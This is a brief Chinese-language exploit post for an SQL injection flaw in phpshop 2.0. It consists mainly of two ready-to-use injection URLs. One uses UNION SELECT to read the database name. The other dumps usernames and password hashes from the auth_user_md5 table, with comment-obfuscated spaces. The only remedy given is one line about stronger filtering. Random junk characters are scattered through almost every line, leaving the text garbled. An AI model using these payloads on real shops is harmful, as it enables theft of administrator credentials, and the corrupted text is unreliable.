标题 : phpshop 2.0 SQL Injection Vulnerability
: Y- k3 N5 D) v- R$ ^- r, l" p; v/ L- V: d5 ^% f8 B) s- B
作者 : By onestree
7 x8 x5 R! m, [6 o0 ]下载地址 : http://code.google.com/p/phpshop/downloads/list- ~9 Q! w- g" o- W
测试地址: windows 7 / ubuntu
4 G- }' I5 }# g8 g/ H2 [
9 h% l/ i* M/ G1 ?" j
7 ?7 s' K* x$ Z N5 k+ JSQLi p0c:
! f2 T, M! L+ y$ n( d9 \$ W ) l$ @7 z( s7 D% t" D3 ?
==================
$ |3 k7 c9 i: Y5 J 1 y: Y0 n6 ~: X# h1 A
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
6 B# F- Y H; v, ]2 Funion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
6 f8 a" R( ` K6 L( S* `9 S0 [
+ R! C' o) T7 n* y* khttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--* T# v* w5 s7 A
0 J8 q9 y) ]: ?" M" ]0 D& k0 ~
修复:
- t+ ]0 V' U5 l( A: r* t9 M/ E加强过滤8 T) v. C& `% W& y2 n3 c
( h; E$ ]6 ~; G. _/ h6 a" C q
5 T1 @" h9 a0 X5 w6 j |